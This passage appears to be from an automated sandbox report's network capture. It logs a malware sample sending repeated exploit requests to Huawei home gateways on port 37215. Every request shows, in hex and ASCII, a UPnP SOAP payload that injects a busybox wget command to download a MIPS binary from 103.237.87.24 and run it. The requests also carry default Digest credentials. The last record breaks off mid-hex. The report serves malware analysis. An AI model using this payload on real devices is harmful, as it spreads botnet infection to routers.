                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1486192.168.2.135970641.210.101.3737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.486160040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1487192.168.2.1335792157.198.12.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.486438990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1488192.168.2.1340952157.9.139.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.486460924 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1489192.168.2.1345026157.5.238.9537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.486469984 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1490192.168.2.1338454197.188.240.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.491435051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1491192.168.2.1338100197.231.107.25437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.491492987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1492192.168.2.133969280.161.103.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.491492987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1493192.168.2.1337778157.168.22.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.491554022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1494192.168.2.136052041.224.57.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.491564035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1495192.168.2.1354236157.187.30.23037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.491743088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 